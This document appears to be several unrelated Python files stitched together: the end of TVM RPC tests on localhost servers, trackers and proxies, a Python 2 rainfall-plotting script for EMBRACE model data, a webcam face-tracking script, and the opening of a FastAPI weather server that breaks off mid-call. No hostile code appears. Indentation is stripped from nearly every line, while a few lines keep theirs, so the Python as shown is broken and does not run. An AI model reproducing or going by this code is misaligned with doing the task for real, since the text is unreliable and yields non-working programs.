def test_rpc_simple_wlog():
server = rpc.Server(key="x1")
client = rpc.connect("127.0.0.1", server.port, key="x1", enable_logging=True)
def check_remote():
f1 = client.get_function("rpc.test.addone")
assert f1(10) == 11
f3 = client.get_function("rpc.test.except")
with pytest.raises(tvm._ffi.base.TVMError):
f3("abc")
f2 = client.get_function("rpc.test.strcat")
assert f2("abc", 11) == "abc:11"
check_remote()
@tvm.testing.requires_rpc
def test_rpc_runtime_string():
server = rpc.Server(key="x1")
client = rpc.connect("127.0.0.1", server.port, key="x1")
def check_remote():
func = client.get_function("rpc.test.runtime_str_concat")
x = tvm.runtime.container.String("abc")
y = tvm.runtime.container.String("def")
assert str(func(x, y)) == "abcdef"
check_remote()
@tvm.testing.requires_rpc
def test_rpc_array():
server = rpc.Server()
remote = rpc.connect("127.0.0.1", server.port)
def check_remote():
x = np.ones((3, 4))
r_cpu = tvm.nd.array(x, remote.cpu(0))
assert str(r_cpu.device).startswith("remote")
np.testing.assert_equal(r_cpu.numpy(), x)
fremote = remote.get_function("rpc.test.remote_array_func")
fremote(r_cpu)
check_remote()
@tvm.testing.requires_rpc
def test_rpc_large_array():
# testcase of large array creation
server = rpc.Server()
remote = rpc.connect("127.0.0.1", server.port)
def check_remote():
dev = remote.cpu(0)
a_np = np.ones((5041, 720)).astype("float32")
b_np = np.ones((720, 192)).astype("float32")
a = tvm.nd.array(a_np, dev)
b = tvm.nd.array(b_np, dev)
np.testing.assert_equal(a.numpy(), a_np)
np.testing.assert_equal(b.numpy(), b_np)
check_remote()
@tvm.testing.requires_rpc
def test_rpc_echo():
def check(remote):
fecho = remote.get_function("testing.echo")
assert fecho(1, 2, 3) == 1
assert fecho(100, 2, 3) == 100
assert fecho("xyz") == "xyz"
assert bytes(fecho(bytearray(b"123"))) == b"123"
with pytest.raises(RuntimeError):
raise_err = remote.get_function("testing.test_raise_error_callback")("RuntimeError")
raise_err()
remote.cpu().sync()
with pytest.raises(AttributeError):
f3 = remote.system_lib()["notexist"]
temp = rpc.server._server_env([])
server = rpc.Server()
client = rpc.connect("127.0.0.1", server.port)
check(rpc.LocalSession())
check(client)
def check_minrpc():
if tvm.get_global_func("rpc.CreatePipeClient", allow_missing=True) is None:
return
# Test minrpc server.
temp = utils.tempdir()
minrpc_exec = temp.relpath("minrpc")
tvm.rpc.with_minrpc(cc.create_executable)(minrpc_exec, [])
check(rpc.PopenSession(minrpc_exec))
# minrpc on the remote
server = rpc.Server()
client = rpc.connect(
"127.0.0.1",
server.port,
session_constructor_args=["rpc.PopenSession", open(minrpc_exec, "rb").read()],
)
check(client)
check_minrpc()
@tvm.testing.requires_rpc
def test_rpc_file_exchange():
server = rpc.Server()
remote = rpc.connect("127.0.0.1", server.port)
def check_remote():
blob = bytearray(np.random.randint(0, 10, size=(10)))
remote.upload(blob, "dat.bin")
rev = remote.download("dat.bin")
assert rev == blob
check_remote()
@tvm.testing.requires_rpc
@tvm.testing.requires_llvm
def test_rpc_remote_module():
# graph
n = tvm.runtime.convert(102)
A = te.placeholder((n,), name="A")
B = te.compute(A.shape, lambda *i: A(*i) + 1.0, name="B")
s = te.create_schedule(B.op)
server0 = rpc.Server(key="x0")
server1 = rpc.Server(key="x1")
client = rpc.connect(
"127.0.0.1",
server0.port,
key="x0",
session_constructor_args=["rpc.Connect", "127.0.0.1", server1.port, "x1", False],
)
def check_remote(remote):
temp = utils.tempdir()
dev = remote.cpu(0)
f = tvm.build(s, [A, B], "llvm", name="myadd")
path_dso = temp.relpath("dev_lib.so")
f.export_library(path_dso)
remote.upload(path_dso)
f1 = remote.load_module("dev_lib.so")
a = tvm.nd.array(np.random.uniform(size=102).astype(A.dtype), dev)
b = tvm.nd.array(np.zeros(102, dtype=A.dtype), dev)
time_f = f1.time_evaluator(f1.entry_name, remote.cpu(0), number=10)
cost = time_f(a, b).mean
print("%g secs/op" % cost)
np.testing.assert_equal(b.numpy(), a.numpy() + 1)
# Download the file from the remote
path_tar = temp.relpath("dev_lib.tar")
f.export_library(path_tar)
remote.upload(path_tar)
local_download_path = temp.relpath("dev_lib.download.so")
with open(local_download_path, "wb") as fo:
fo.write(remote.download_linked_module("dev_lib.tar"))
fupdated = tvm.runtime.load_module(local_download_path)
a = tvm.nd.array(np.random.uniform(size=102).astype(A.dtype), tvm.cpu(0))
b = tvm.nd.array(np.zeros(102, dtype=A.dtype), tvm.cpu(0))
fupdated(a, b)
np.testing.assert_equal(b.numpy(), a.numpy() + 1)
def check_minrpc():
if tvm.get_global_func("rpc.CreatePipeClient", allow_missing=True) is None:
return
# export to minrpc
temp = utils.tempdir()
runtime = Runtime("cpp", {"system-lib": True})
f = tvm.build(s, [A, B], "llvm", name="myadd", runtime=runtime)
path_minrpc = temp.relpath("dev_lib.minrpc")
f.export_library(path_minrpc, rpc.with_minrpc(cc.create_executable))
with pytest.raises(RuntimeError):
rpc.PopenSession("filenotexist")
        # start the minrpc session.
remote = tvm.rpc.PopenSession(path_minrpc)
dev = remote.cpu(0)
f1 = remote.system_lib()
a = tvm.nd.array(np.random.uniform(size=102).astype(A.dtype), dev)
b = tvm.nd.array(np.zeros(102, dtype=A.dtype), dev)
time_f = f1.time_evaluator("myadd", remote.cpu(0), number=1)
cost = time_f(a, b).mean
np.testing.assert_equal(b.numpy(), a.numpy() + 1)
# change to not executable
os.chmod(path_minrpc, stat.S_IRUSR)
with pytest.raises(RuntimeError):
rpc.PopenSession(path_minrpc)
def check_remote_link_cl(remote):
"""Test function to run remote code such as cl
This is not enabled because there is forking issue
of TVM runtime when server launches after OpenCL
runtime initializes. We leave it as an example
on how to do rpc when we want to do linking on remote.
"""
if not tvm.testing.device_enabled("opencl"):
print("Skip because opencl is not enabled")
return
temp = utils.tempdir()
dev = remote.cl(0)
s = te.create_schedule(B.op)
xo, xi = s[B].split(B.op.axis[0], factor=32)
s[B].bind(xo, te.thread_axis("blockIdx.x"))
s[B].bind(xi, te.thread_axis("threadIdx.x"))
f = tvm.build(s, [A, B], "opencl --host=llvm", name="myadd")
# Option 1: save modules separately and rely on remote compiler
path_o = temp.relpath("myadd.o")
path_cl = temp.relpath("myadd.cl")
path_json = temp.relpath("myadd.tvm_meta.json")
f.save(path_o)
f.imported_modules[0].save(path_cl)
remote.upload(path_o)
remote.upload(path_cl)
# upload meta data
remote.upload(path_json)
fhost = remote.load_module("myadd.o")
fdev = remote.load_module("myadd.cl")
fhost.import_module(fdev)
a = tvm.nd.array(np.random.uniform(size=102).astype(A.dtype), dev)
b = tvm.nd.array(np.zeros(102, dtype=A.dtype), dev)
fhost(a, b)
np.testing.assert_equal(b.numpy(), a.numpy() + 1)
# Option 2: export library as a tar ball then handled by remote compiler
path_tar = temp.relpath("myadd.tar")
f.export_library(path_tar)
remote.upload(path_tar)
fhost = remote.load_module("myadd.tar")
a = tvm.nd.array(np.random.uniform(size=102).astype(A.dtype), dev)
b = tvm.nd.array(np.zeros(102, dtype=A.dtype), dev)
fhost(a, b)
np.testing.assert_equal(b.numpy(), a.numpy() + 1)
check_remote(rpc.LocalSession())
check_remote(client)
check_minrpc()
@tvm.testing.requires_rpc
def test_rpc_return_func():
server = rpc.Server(key="x1")
client = rpc.connect("127.0.0.1", server.port, key="x1")
def check_remote():
f1 = client.get_function("rpc.test.add_to_lhs")
fadd = f1(10)
assert fadd(12) == 22
check_remote()
@tvm.testing.requires_rpc
def test_rpc_session_constructor_args():
# start server
server0 = rpc.Server(key="x0")
server1 = rpc.Server(key="x1")
def check_multi_hop():
# use server0 as proxy to connect to server1
client = rpc.connect(
"127.0.0.1",
server0.port,
key="x0",
session_constructor_args=["rpc.Connect", "127.0.0.1", server1.port, "x1", False],
)
fecho = client.get_function("testing.echo")
assert fecho(1, 2, 3) == 1
assert fecho(100, 2, 3) == 100
assert fecho("xyz") == "xyz"
assert bytes(fecho(bytearray(b"123"))) == b"123"
nd = tvm.nd.array([1, 2, 3], device=client.cpu(0))
assert nd.numpy()[1] == 2
def check_error_handling():
with pytest.raises(tvm.error.RPCError):
client = rpc.connect(
"127.0.0.1",
server0.port,
key="x0",
session_constructor_args=["rpc.NonExistingConstructor"],
)
check_multi_hop()
check_error_handling()
@tvm.testing.requires_rpc
def test_rpc_return_ndarray():
# start server
server = rpc.Server(key="x1")
client = rpc.connect("127.0.0.1", server.port, key="x1")
m = client.get_function("rpc.test.remote_return_nd")
get_arr = m("get_arr")
ref_count = m("ref_count")
get_elem = m("get_elem")
get_arr_elem = m("get_arr_elem")
# array test
def run_arr_test():
arr = get_arr()
assert get_elem(0) == 0.0
assert get_arr_elem(arr, 0) == 0.0
run_arr_test()
@tvm.testing.requires_rpc
def test_local_func():
client = rpc.LocalSession()
def check_remote():
f1 = client.get_function("rpc.test.add_to_lhs")
fadd = f1(10)
assert fadd(12) == 22
blob = bytearray(np.random.randint(0, 10, size=(10)))
client.upload(blob, "dat.bin")
rev = client.download("dat.bin")
assert rev == blob
check_remote()
@tvm.testing.requires_rpc
def test_rpc_tracker_register():
# test registration
tracker = Tracker(port=9000, port_end=10000)
device_key = "test_device"
server1 = rpc.Server(
host="127.0.0.1",
port=9000,
port_end=10000,
key=device_key,
tracker_addr=("127.0.0.1", tracker.port),
)
server2 = rpc.Server(
host="127.0.0.1",
port=9000,
port_end=10000,
key=device_key,
tracker_addr=("127.0.0.1", tracker.port),
custom_addr="test_addr", # this is a test address, which is unable to connect
)
time.sleep(1)
client = rpc.connect_tracker("127.0.0.1", tracker.port)
def exist_address(summary, key, host, port):
server_info = summary["server_info"]
for device in server_info:
if device["key"] == "server:%s" % key:
addr = device["addr"]
if (host is None or host == addr[0]) and port == addr[1]:
return True
return False
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 2
assert exist_address(summary, device_key, "127.0.0.1", server1.port)
assert exist_address(summary, device_key, "test_addr", server2.port)
remote = client.request(device_key)
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 1
del remote
time.sleep(1)
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 2
server1.terminate()
time.sleep(1)
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 1
assert not exist_address(summary, device_key, "127.0.0.1", server1.port)
assert exist_address(summary, device_key, "test_addr", server2.port)
server2.terminate()
time.sleep(1)
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 0
assert not exist_address(summary, device_key, "test_addr", server2.port)
tracker.terminate()
def _target(host, port, device_key, timeout):
client = rpc.connect_tracker(host, port)
remote = client.request(device_key, session_timeout=timeout)
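    # Busy-wait forever to keep the requested session occupied; the parent
    # test terminates this process to release the device.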
while True:
pass
remote.cpu()
@tvm.testing.requires_rpc
def test_rpc_tracker_request():
# test concurrent request
tracker = Tracker(port=9000, port_end=10000)
device_key = "test_device"
server = rpc.Server(
port=9000,
port_end=10000,
key=device_key,
tracker_addr=("127.0.0.1", tracker.port),
)
client = rpc.connect_tracker("127.0.0.1", tracker.port)
proc1 = multiprocessing.Process(target=_target, args=("127.0.0.1", tracker.port, device_key, 4))
proc2 = multiprocessing.Process(
target=_target, args=("127.0.0.1", tracker.port, device_key, 200)
)
proc1.start()
time.sleep(0.5)
proc2.start()
time.sleep(0.5)
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 0
assert summary["queue_info"][device_key]["pending"] == 1
proc1.terminate()
proc1.join()
time.sleep(0.5)
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 0
assert summary["queue_info"][device_key]["pending"] == 0
proc2.terminate()
proc2.join()
server.terminate()
tracker.terminate()
@tvm.testing.requires_rpc
def test_rpc_tracker_via_proxy():
"""
tracker
/ \
Host -- Proxy -- RPC server
"""
device_key = "test_device"
tracker_server = Tracker(port=9000, port_end=9100)
proxy_server = Proxy(
host=tracker_server.host,
port=8888,
port_end=8988,
tracker_addr=(tracker_server.host, tracker_server.port),
)
server1 = rpc.Server(
host=proxy_server.host,
port=proxy_server.port,
key=device_key,
tracker_addr=(tracker_server.host, tracker_server.port),
is_proxy=True,
)
server2 = rpc.Server(
host=proxy_server.host,
port=proxy_server.port,
key=device_key,
tracker_addr=(tracker_server.host, tracker_server.port),
is_proxy=True,
)
client = rpc.connect_tracker(tracker_server.host, tracker_server.port)
remote1 = client.request(device_key, session_timeout=30) # pylint: disable=unused-variable
remote2 = client.request(device_key, session_timeout=30) # pylint: disable=unused-variable
server2.terminate()
server1.terminate()
proxy_server.terminate()
tracker_server.terminate()
|
plot_from_pp_avg5216_regrid_3_hourly.py
|
"""
Load pp, plot and save
"""
import os, sys
import matplotlib
matplotlib.use('Agg') # Must be before importing matplotlib.pyplot or pylab!
from matplotlib import rc
from matplotlib.font_manager import FontProperties
from matplotlib import rcParams
from mpl_toolkits.basemap import Basemap
rc('font', family = 'serif', serif = 'cmr10')
rc('text', usetex=True)
rcParams['text.usetex']=True
rcParams['text.latex.unicode']=True
rcParams['font.family']='serif'
rcParams['font.serif']='cmr10'
import matplotlib.pyplot as plt
#from matplotlib import figure
import matplotlib as mpl
import matplotlib.cm as mpl_cm
import numpy as np
import iris
import iris.coords as coords
import iris.quickplot as qplt
import iris.plot as iplt
import iris.coord_categorisation
import iris.unit as unit
import cartopy.crs as ccrs
import cartopy.io.img_tiles as cimgt
import matplotlib.ticker as mticker
from cartopy.mpl.gridliner import LONGITUDE_FORMATTER, LATITUDE_FORMATTER
import datetime
from mpl_toolkits.basemap import cm
import imp
from textwrap import wrap
import re
import iris.analysis.cartography
import math
from dateutil import tz
#import multiprocessing as mp
import gc
import types
save_path='/nfs/a90/eepdw/Figures/EMBRACE/'
model_name_convert_title = imp.load_source('util', '/nfs/see-fs-01_users/eepdw/python_scripts/modules/model_name_convert_title.py')
unrotate = imp.load_source('util', '/nfs/see-fs-01_users/eepdw/python_scripts/modules/unrotate_pole.py')
pp_file = 'rain_mean_by_hour'
degs_crop_top = 1.7
degs_crop_bottom = 2.5
min_contour = 0
max_contour = 3
tick_interval=0.3
figprops = dict(figsize=(8,8), dpi=360)
clevs = np.linspace(min_contour, max_contour,256)
cmap=cm.s3pcpn_l
ticks = (np.arange(min_contour, max_contour+tick_interval,tick_interval))
u = unit.Unit('hours since 1970-01-01 00:00:00',calendar='gregorian')
dx, dy = 10, 10
divisor=10 # for lat/lon rounding
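# A hedged helper restating the gridline-tick rounding done inline in main()
# below (not called by the script): floor the lower bound and ceil the upper
# bound to the nearest multiple of `step`, e.g. (64.115, 101.866) -> (60.0, 110.0).
def _tick_bounds(low, high, step=divisor):
    return low - (low % step), math.ceil(high / step) * step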
def main():
#experiment_ids = ['djznw', 'djzny', 'djznq', 'djzns', 'dkjxq', 'dklyu', 'dkmbq', 'dklwu', 'dklzq', 'dkbhu', 'djznu', 'dkhgu' ] # All 12
#experiment_ids = ['djzny', 'djzns', 'djznw', 'dkjxq', 'dklyu', 'dkmbq', 'dklwu', 'dklzq' ]
#experiment_ids = ['djzny', 'djzns', 'djznu', 'dkbhu', 'dkjxq', 'dklyu', 'dkmbq', 'dklwu', 'dklzq', 'dkhgu']
#experiment_ids = ['djzns', 'djznu', 'dkbhu', 'dkjxq', 'dklyu', 'dkmbq', 'dklwu', 'dklzq', 'dkhgu']
experiment_ids = ['dklzq', 'dkmbq', 'dkjxq', 'dklwu', 'dklyu', 'djzns']
#experiment_ids = ['djzns' ]
#experiment_ids = ['dkhgu','dkjxq']
for experiment_id in experiment_ids:
model_info=re.sub('(.{68} )', '\\1\n', str(model_name_convert_title.main(experiment_id)), 0, re.DOTALL)
expmin1 = experiment_id[:-1]
pfile = '/nfs/a90/eepdw/Data/EMBRACE/Mean_State/pp_files/%s/%s/%s.pp' % (expmin1, experiment_id, pp_file)
#pc = iris(pfile)
pcube = iris.load_cube(pfile)
pcube=iris.analysis.maths.multiply(pcube,3600)
# For each hour in cube
# Get min and max latitude/longitude and unrotate to get min/max corners to crop plot automatically - otherwise end with blank bits on the edges
lats = pcube.coord('grid_latitude').points
lons = pcube.coord('grid_longitude').points
cs = pcube.coord_system('CoordSystem')
if isinstance(cs, iris.coord_systems.RotatedGeogCS):
print 'Rotated CS %s' % cs
lon_low= np.min(lons)
lon_high = np.max(lons)
lat_low = np.min(lats)
lat_high = np.max(lats)
lon_corners, lat_corners = np.meshgrid((lon_low, lon_high), (lat_low, lat_high))
lon_corner_u,lat_corner_u = unrotate.unrotate_pole(lon_corners, lat_corners, cs.grid_north_pole_longitude, cs.grid_north_pole_latitude)
lon_low = lon_corner_u[0,0]
lon_high = lon_corner_u[0,1]
lat_low = lat_corner_u[0,0]
lat_high = lat_corner_u[1,0]
else:
lon_low= np.min(lons)
lon_high = np.max(lons)
lat_low = np.min(lats)
lat_high = np.max(lats)
#lon_low= 62
#lon_high = 102
#lat_low = -7
#lat_high = 33
#lon_high_box = 101.866
#lon_low_box = 64.115
#lat_high_box = 33.
#lat_low_box =-6.79
#lon_high = 101.866
#lon_low = 64.115
#lat_high = 33.
#lat_low =-6.79
lon_low_tick=lon_low -(lon_low%divisor)
lon_high_tick=math.ceil(lon_high/divisor)*divisor
lat_low_tick=lat_low - (lat_low%divisor)
lat_high_tick=math.ceil(lat_high/divisor)*divisor
print lat_high_tick
print lat_low_tick
for t, time_cube in enumerate(pcube.slices(['grid_latitude', 'grid_longitude'])):
print time_cube
# Get mid-point time of averages
h_max = u.num2date(time_cube.coord('time').bounds[0].max()).strftime('%H%M')
h_min = u.num2date(time_cube.coord('time').bounds[0].min()).strftime('%H%M')
#Convert to India time
from_zone = tz.gettz('UTC')
to_zone = tz.gettz('Asia/Kolkata')
h_max_utc = u.num2date(time_cube.coord('time').bounds[0].max()).replace(tzinfo=from_zone)
h_min_utc = u.num2date(time_cube.coord('time').bounds[0].min()).replace(tzinfo=from_zone)
h_max_local = h_max_utc.astimezone(to_zone).strftime('%H%M')
h_min_local = h_min_utc.astimezone(to_zone).strftime('%H%M')
#m = u.num2date(time_cube.coord('time').bounds[0].mean()).minute
#h = u.num2date(time_cube.coord('time').bounds[0].mean()).hour
#if t==0:
fig = plt.figure(**figprops)
ax = plt.axes(projection=ccrs.PlateCarree(), extent=(lon_low,lon_high,lat_low+degs_crop_bottom,lat_high-degs_crop_top))
#ax = fig.axes(projection=ccrs.PlateCarree(), extent=(lon_low,lon_high,lat_low,lat_high))
#ax = fig.axes(projection=ccrs.PlateCarree())
cont = iplt.contourf(time_cube, clevs, cmap=cmap, extend='both')
#del time_cube
#fig.clabel(cont, fmt='%d')
#ax.stock_img()
ax.coastlines(resolution='110m', color='#262626')
gl = ax.gridlines(draw_labels=True,linewidth=0.5, color='#262626', alpha=0.5, linestyle='--')
gl.xlabels_top = False
gl.ylabels_right = False
#gl.xlines = False
dx, dy = 10, 10
gl.xlocator = mticker.FixedLocator(range(int(lon_low_tick),int(lon_high_tick)+dx,dx))
gl.ylocator = mticker.FixedLocator(range(int(lat_low_tick),int(lat_high_tick)+dy,dy))
gl.xformatter = LONGITUDE_FORMATTER
gl.yformatter = LATITUDE_FORMATTER
gl.xlabel_style = {'size': 12, 'color':'#262626'}
#gl.xlabel_style = {'color': '#262626', 'weight': 'bold'}
gl.ylabel_style = {'size': 12, 'color':'#262626'}
cbar = fig.colorbar(cont, orientation='horizontal', pad=0.05, extend='both')
cbar.set_label('mm/h', fontsize=10, color='#262626')
#cbar.set_label(time_cube.units, fontsize=10, color='#262626')
cbar.set_ticks(np.arange(min_contour, max_contour+tick_interval,tick_interval))
cbar.set_ticklabels(['${%.1f}$' % i for i in ticks])
cbar.ax.tick_params(labelsize=10, color='#262626')
# fig.canvas.draw()
# background = fig.canvas.copy_from_bbox(fig.bbox)
# fig = plt.figure(frameon=False,**figprops)
# make sure frame is off, or everything in existing background
# will be obliterated.
# ax = fig.add_subplot(111,frameon=False)
# restore previous background.
# fig.canvas.restore_region(background)
# time_cube=iris.analysis.maths.multiply(time_cube,3600)
# cont = iplt.contourf(time_cube, clevs, cmap=cmap, extend='both')
#print cont.collections()
#################################################################
## Bug fix for Quad Contour set not having attribute 'set_visible'
# def setvisible(self,vis):
# for c in self.collections: c.set_visible(vis)
# cont.set_visible = types.MethodType(setvisible,)
# cont.axes = plt.gca()
# cont.figure=fig
####################################################################
#ims.append([im])
main_title='Mean Rainfall for EMBRACE Period -%s-%s UTC (%s-%s IST)' % (h_min, h_max, h_min_local, h_max_local)
#main_title=time_cube.standard_name.title().replace('_',' ')
#model_info = re.sub(r'[(\']', ' ', model_info)
#model_info = re.sub(r'[\',)]', ' ', model_info)
#print model_info
if not os.path.exists('%s%s/%s' % (save_path, experiment_id, pp_file)): os.makedirs('%s%s/%s' % (save_path, experiment_id, pp_file))
#fig.show()
fig.savefig('%s%s/%s/%s_%s_%s-%s_notitle.png' % (save_path, experiment_id, pp_file, experiment_id, pp_file, h_min, h_max), format='png', bbox_inches='tight')
plt.title('%s-%s UTC %s-%s IST' % (h_min,h_max, h_min_local, h_max_local))
fig.savefig('%s%s/%s/%s_%s_%s-%s_short_title.png' % (save_path, experiment_id, pp_file, experiment_id, pp_file, h_min, h_max), format='png', bbox_inches='tight')
plt.title('\n'.join(wrap('%s\n%s' % (main_title, model_info), 1000,replace_whitespace=False)), fontsize=16)
fig.savefig('%s%s/%s/%s_%s_%s-%s.png' % (save_path, experiment_id, pp_file, experiment_id, pp_file, h_min, h_max), format='png', bbox_inches='tight')
fig.clf()
plt.close()
#del time_cube
gc.collect()
if __name__ == '__main__':
main()
#proc=mp.Process(target=worker)
#proc.daemon=True
#proc.start()
#proc.join()
|
facial_recognition.py
|
import sys
import numpy as np
from skimage import transform as tf
import cv2
from threading import Thread
NUM_PYR = 2
WINDOW_AMT = 8
assert (float(WINDOW_AMT) / (2 ** NUM_PYR)).is_integer(), "WINDOW_AMT must remain an integer at all pyramid levels."
DISP_SCALE = 0.7
AVERAGE_FACE_WIDTH = 250
START_FACE_DIST = 310
RESCALING_FACTORS = [0.5, 1, 1.5]
ROT_AMTS = np.linspace(-45, 45, num=3)
class WebcamImageGetter:
def __init__(self):
self.currentFrame = None
self.capture = cv2.VideoCapture(0)
self.keep_going = True
def start(self):
Thread(target=self.updateFrame, args=()).start()
def updateFrame(self):
while self.keep_going:
ret, frame = self.capture.read()
if ret:
self.currentFrame= cv2.resize(frame, dsize=(0, 0), fx=DISP_SCALE, fy=DISP_SCALE)
def getFrame(self):
return self.currentFrame
class FacialRecognition:
def end(self):
cv2.destroyWindow("frame")
cv2.waitKey(1)
self.ig.keep_going = False
def run(self):
self.calibrate()
while True:
best_i, best_j, frame, interp_shape, interp_rot = self.get_face()
if self.init_interp_shape is None:
self.init_interp_shape = interp_shape
# Display bounding box
color = self.compute_interp_color(interp_shape)
cv2.rectangle(frame, (WINDOW_AMT*best_j, WINDOW_AMT*best_i), (WINDOW_AMT*best_j + self.w, WINDOW_AMT*best_i + self.h), color=color, thickness=2)
cv2.imshow("frame", frame)
if cv2.waitKey(1) & 0xFF == 10:
cv2.destroyWindow("frame")
self.ig.keep_going = False
break
def compute_interp_color(self, interp_shape):
amt = np.linalg.norm(interp_shape - self.init_interp_shape)
if interp_shape[0] < self.init_interp_shape[0]:
val = min(1.0, amt / 15.0)
return (255 * (1 - val), 255 * val, 0)
else:
val = min(1.0, amt / 15.0)
return (255 * (1 - val), 0, 255 * val)
def calibrate(self):
self.ig = WebcamImageGetter()
self.ig.start()
self.init_interp_shape = None
print "Place face 1 ft from camera. When face is visible, press Enter to continue."
while True:
frame = self.ig.getFrame()
if frame is None:
continue
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
face_cascade = cv2.CascadeClassifier("haarcascades/haarcascade_frontalface_default.xml")
faces = face_cascade.detectMultiScale(gray, scaleFactor=1.3, minNeighbors=5)
for x, y, w, h in faces:
cv2.rectangle(frame, (x, y), (x + w, y + h), color=(255, 0, 0), thickness=2)
cv2.imshow("calibration", frame)
if cv2.waitKey(1) & 0xFF == 10:
cv2.destroyWindow("calibration")
if len(faces) > 0:
break
else:
print "No face detected."
x, y, w, h = faces[0]
num_pix = float(w*h)
face_roi = frame[y:y+h, x:x+w]
rotated_faces = [tf.rotate(face_roi, angle=rot_ang) for rot_ang in ROT_AMTS]
self.rotated_face_pyramids = [list(tf.pyramid_gaussian(face, max_layer=NUM_PYR, downscale=2))
for face in rotated_faces]
scaled_faces = [tf.rescale(face_roi, scale=sc) for sc in RESCALING_FACTORS]
self.scaled_face_pyramids = [list(tf.pyramid_gaussian(face, max_layer=NUM_PYR, downscale=2))
for face in scaled_faces]
# scaled_weights are used for scaled_faces
self.scaled_weights = [num_pix / (sf.shape[0]*sf.shape[1]) for sf in scaled_faces]
# we observed that the small detector is too strong, so we penalize it more
self.scaled_weights[0] *= 1.5
# w = f*Y/Z --> f = wZ/Y
self.camera_f = w * START_FACE_DIST/AVERAGE_FACE_WIDTH
self.start_center = np.array((x + w/2.0, y+h/2.0))
self.w = w; self.h = h
cv2.destroyWindow("calibration")
cv2.waitKey(1)
cv2.destroyWindow("calibration")
cv2.waitKey(1)
print "Tracking face...press Enter to quit."
print "Red: close, green: far, blue: in between."
def get_face(self, do_rot=True, do_scale=True):
frame = self.ig.getFrame()
frame_pyramid = list(tf.pyramid_gaussian(frame, max_layer=NUM_PYR, downscale=2))
scale_ssds = {}
for i, face_pyramid in enumerate(self.scaled_face_pyramids):
if not do_scale and i != 1:
continue
res = self.determine_best_shift(face_pyramid, frame_pyramid)
best_i, best_j, best_ssd = res
scale_ssds[i] = (1.0 / (best_ssd * self.scaled_weights[i]), best_i, best_j, np.array(face_pyramid[0].shape))
if len(scale_ssds) == 3 or not do_scale:
best_i, best_j = scale_ssds[1][1], scale_ssds[1][2]
else:
best_i, best_j = scale_ssds[0][1], scale_ssds[0][2]
total = sum([v[0] for v in scale_ssds.values()])
interp_shape = sum([v[0] / total * v[3] for v in scale_ssds.values()])
rot_ssds = {}
for i, face_pyramid in enumerate(self.rotated_face_pyramids):
if not do_rot and i != 1:
continue
res = self.determine_best_shift(face_pyramid, frame_pyramid)
rot_best_i, rot_best_j, best_ssd = res
rot_ssds[i] = (1.0 / best_ssd, rot_best_i, rot_best_j, np.array(face_pyramid[0].shape))
total = sum([v[0] for v in rot_ssds.values()])
interp_rot = sum([v[0] / total * ROT_AMTS[k] for k, v in rot_ssds.items()])
return best_i, best_j, frame, interp_shape, interp_rot
def get_transforms(self, do_rot=True, do_scale=True, do_trans=True):
best_i, best_j, frame, interp_shape, interp_rot = self.get_face(do_rot, do_scale)
# Rotation amount
if self.init_interp_shape is None:
self.init_interp_shape = interp_shape
if do_trans:
center = (np.array((WINDOW_AMT*best_j, WINDOW_AMT*best_i)) + np.array((WINDOW_AMT*best_j + self.w, WINDOW_AMT*best_i + self.h))) / 2.0
disp = center - self.start_center
        else:
            # `center` is only computed in the do_trans branch; without
            # translation tracking the displacement is simply zero.
            disp = np.zeros(2)
rot = np.arctan(disp/START_FACE_DIST) * (180 / np.pi) # change to actual face dist
# Z-Axis translation amt: w = fX/Z -> Z = fX/w
ztrans = self.camera_f - self.camera_f * interp_shape[0] / self.w
# Display image (for fun)
color = self.compute_interp_color(interp_shape)
cv2.rectangle(frame, (WINDOW_AMT*best_j, WINDOW_AMT*best_i), (WINDOW_AMT*best_j + self.w, WINDOW_AMT*best_i + self.h), color=color, thickness=2)
cv2.imshow("frame", frame)
cv2.waitKey(1)
return np.array(rot), ztrans, interp_rot
def determine_best_shift(self, face_pyramid, frame_pyramid):
wa = int(WINDOW_AMT / (2 ** NUM_PYR))
region_indices = [0, (frame_pyramid[-1].shape[0] - face_pyramid[-1].shape[0]) / wa,
0, (frame_pyramid[-1].shape[1] - face_pyramid[-1].shape[1]) / wa]
for pyr_index in reversed(range(NUM_PYR+1)):
res = self.compute_ssd(frame_pyramid[pyr_index],
face_pyramid[pyr_index],
2 ** pyr_index,
region_indices)
if res is None:
break
best_i, best_j, tmp_ssd = res
if pyr_index == NUM_PYR:
best_ssd = tmp_ssd
region_indices = [best_i - 1, best_i + 1,
best_j - 1, best_j + 1]
return best_i, best_j, best_ssd
def compute_ssd(self, frame, face, scaleAmt, region_indices):
wa = int(WINDOW_AMT / scaleAmt)
h = face.shape[0]
w = face.shape[1]
ssds = {}
for i in range(region_indices[0], region_indices[1]):
for j in range(region_indices[2], region_indices[3]):
cand_roi = frame[wa*i:wa*i+h, wa*j:wa*j+w]
if cand_roi.shape == face.shape:
ssds[(i, j)] = ((face - cand_roi) ** 2).sum()
if not ssds:
return None
best_i, best_j = min(ssds, key=lambda k: ssds[k])
return best_i, best_j, ssds[(best_i, best_j)]
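# A hedged numeric sketch (not used by the class) of the pinhole-camera
# relations in calibrate() and get_transforms(), w = f * X / Z: a face of
# real width X = 250 mm seen as w = 200 px at Z = 310 mm implies a focal
# length f = w * Z / X = 248 px, and a later width of 100 px implies
# Z = f * X / w = 620 mm.
def _pinhole_demo():
    X, w, Z = 250.0, 200.0, 310.0
    f = w * Z / X
    w_new = 100.0
    return f, f * X / w_new  # (248.0, 620.0)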
def main():
FacialRecognition().run()
if __name__ == "__main__":
main()
|
server.py
|
from fastapi import FastAPI, Request, Response
from fastapi.responses import JSONResponse, FileResponse, HTMLResponse
from fastapi.staticfiles import StaticFiles
import json, os
from util import fetchWeatherInformation, Calendar
from multiprocessing import Process
import time
import uvicorn
import datetime
import icmplib
def apiFetchLoop(conf):  # Periodically fetch API data and persist it locally
# Initialize calendar
calendars = [Calendar(os.path.join(*conf['calKey'].split('/')), c['id'], emailMap=conf['emailMap'], tz=conf['timezone'], name=c['name'], color=c['color']) for c in conf['calendars']]
while True:
# Get weather info
data, img = fetchWeatherInformation(
conf['target']['latitude'],
conf['target']['longitude'],
conf['target']['zoom'],
keys={
'owm': conf['owmKey'],
'mapbox': conf['mbKey']
},
tileSpan=conf['target']['tileSpan'],
includeLayers=conf['target']['layers'],
